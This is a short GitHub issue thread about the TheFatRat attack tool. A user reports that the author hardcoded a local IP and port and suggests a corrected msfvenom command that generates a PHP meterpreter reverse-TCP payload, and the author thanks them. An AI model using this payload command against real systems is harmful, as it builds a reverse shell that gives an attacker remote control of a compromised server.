### ISSUE TITLE
feedback.

### ISSUE THREAD

**Issue by crach60** [Screetsec/TheFatRat#15]
Hi ! 

You left your IP address and your port in your code ;)

"php/meterpreter/reverse_tcp LHOST=**192.168.1.4** LPORT=**6000** R > output/$fira.php "

![error](https://cloud.githubusercontent.com/assets/22057703/19365765/8e3eaf2a-9194-11e6-8ef8-bf64a9c598c8.png)

My answer : 

**msfvenom -p** php/meterpreter/reverse_tcp LHOST=**$yourip** LPORT=**$yourport** R > output/$fira.php 

Very good Job !!

**Comment by Screetsec** [comment]
wahwahwah thankyou , im so tired so im forgot
